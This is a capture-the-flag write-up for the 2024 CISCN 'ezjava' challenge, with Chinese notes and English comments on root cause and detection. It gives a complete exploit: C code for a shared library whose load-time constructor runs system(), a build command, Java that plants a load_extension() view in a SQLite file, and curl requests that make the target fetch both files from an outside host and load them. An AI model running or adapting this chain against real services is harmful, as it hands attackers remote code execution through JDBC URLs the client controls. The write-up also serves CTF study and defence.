2024ciscn-ezjava

#include <stdio.h>
#include <stdlib.h>

/*
 * Payload body: hands the literal string "cmd" to the shell via system().
 * Nothing in this file calls it directly; it is reached only through the
 * library constructor below, so merely loading the .so is enough to run it.
 */
void a() {
system("cmd");
}

/*
 * Library constructor: the dynamic loader runs this as soon as the shared
 * object is mapped into a process, before any exported symbol is looked up or
 * called. That is why letting an attacker-chosen path reach SQLite's
 * load_extension() is code execution on load, not "just" loading a library,
 * and why extension loading must not be reachable from untrusted SQL, JDBC
 * URLs or database files. For detection, the observable side effect is a
 * database-backed process spawning a shell via system() right after mapping a
 * library from a temporary directory.
 */
__attribute__((constructor)) void init() {
a();
}

编译生成 so 文件
gcc -shared -o vulnso.so -fPIC vulnso.c

生成一个临时文件

package com.example.jdbctest;

import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Statement;

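/**
 * Generates the SQLite database file used in the writeup.
 *
 * <p>The file holds a single view, {@code security}, whose body is a call to
 * SQLite's {@code load_extension()} with a hard-coded path. The view body is not
 * executed here; presumably it is evaluated when the target application later
 * queries the table named in the request (see the curl requests in the writeup)
 * — confirm against the target's code. From a defensive standpoint the lesson is
 * the same either way: a JDBC URL or database file controlled by an untrusted
 * party must be treated as code, and extension loading should not be reachable
 * from it.
 */
public class Gen {

    /** Where the database is written; hard-coded for the writeup. */
    private static final String DB_FILE = "F:/poc.db";

    /**
     * View definition. The path under /tmp appears to be the temporary file the
     * sqlite-jdbc driver extracts a {@code :resource:} URL to; the writeup notes
     * that the numeric part is a hash of the resource URL — verify for the
     * driver version in use.
     */
    private static final String CREATE_VIEW_SQL =
        "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp-2133282111.db'));";

    /**
     * Writes the {@code security} view into {@link #DB_FILE}.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        try {
            // The SQLite JDBC driver must be on the classpath (e.g. in the lib folder).
            Class.forName("org.sqlite.JDBC");
            // try-with-resources closes the connection and statement even when
            // executeUpdate() throws; the original closed them only on success.
            try (Connection conn = DriverManager.getConnection("jdbc:sqlite:" + DB_FILE)) {
                System.out.println("Opened database successfully");
                try (PreparedStatement preStmt = conn.prepareStatement(CREATE_VIEW_SQL)) {
                    preStmt.executeUpdate();
                }
            }
        } catch (ClassNotFoundException | SQLException e) {
            // Script-style tool: report the failure and exit, nothing to recover.
            e.printStackTrace();
        }
    }
}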
# Both requests hand the server a client-supplied JDBC URL ("url") and table
# name, and the server connects to whatever that URL names. That is the root
# cause: a JDBC URL assembled from request data lets the caller choose the
# driver and its options. The server-side fix is an allow-list of fixed
# URLs/drivers (and leaving SQLite extension loading disabled). The sqlite-jdbc
# ":resource:" form appears to fetch the referenced file before opening it —
# confirm against the driver version on the target.
curl --header "Content-Type: application/json"  --request POST  --data '{"type": 3,"url": "jdbc:sqlite::resource:http://106.54.209.118/vulnso.so","tableName": "security"}' http://8.147.129.121:31442/jdbc/connect
# The second request opens the generated poc.db; its "security" view is passed
# as tableName, and querying it is presumably what evaluates load_extension().
curl --header "Content-Type: application/json" --request POST --data '{"type": 3,"url": "jdbc:sqlite::resource:http://106.54.209.118/poc.db","tableName": "security"}' http://8.147.129.121:31442/jdbc/connect


由于

这个 hash 对应的是 http://106.54.209.118/poc.db，在这里卡了一段时间。
依次执行上面的poc.db和vulnso.so